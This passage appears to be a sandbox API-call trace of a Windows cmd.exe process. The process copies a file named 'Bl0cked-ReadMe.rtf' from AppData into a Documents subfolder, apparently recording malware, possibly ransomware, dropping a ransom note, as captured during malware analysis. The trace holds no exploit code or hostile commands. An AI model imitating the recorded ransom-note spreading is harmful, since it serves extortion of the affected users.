[0140.328] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 [0140.329] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.329] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.329] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.329] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.329] GetEnvironmentStringsW () returned 0x402b28* [0140.329] FreeEnvironmentStringsW (penv=0x402b28) returned 1 [0140.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.330] GetConsoleOutputCP () returned 0x1b5 [0140.330] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.330] GetUserDefaultLCID () returned 0x409 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="0") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="0") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="1") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.331] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.332] GetConsoleTitleW (in: lpConsoleTitle=0x3f0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.335] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.335] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.335] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.335] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.335] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.335] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.335] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] GetFileType (hFile=0x7) returned 0x2 [0140.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f8b8 | out: lpMode=0x28f8b8) returned 1 [0140.892] _dup (_FileHandle=1) returned 3 [0140.892] _close (_FileHandle=1) returned 0 [0140.892] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.893] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f888, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.894] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.894] GetConsoleTitleW (in: lpConsoleTitle=0x28f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.895] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.895] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.895] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.895] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.896] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28f21c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f21c) returned 0x3f0eb8 [0140.896] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.896] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.896] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28e128, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.897] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] GetFileType (hFile=0x54) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28e180 | out: lpFileSizeHigh=0x28e180*=0x0) returned 0x1632 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] GetFileType (hFile=0x4c) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] GetFileType (hFile=0x4c) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.900] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.901] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.903] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.903] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.905] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.906] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c 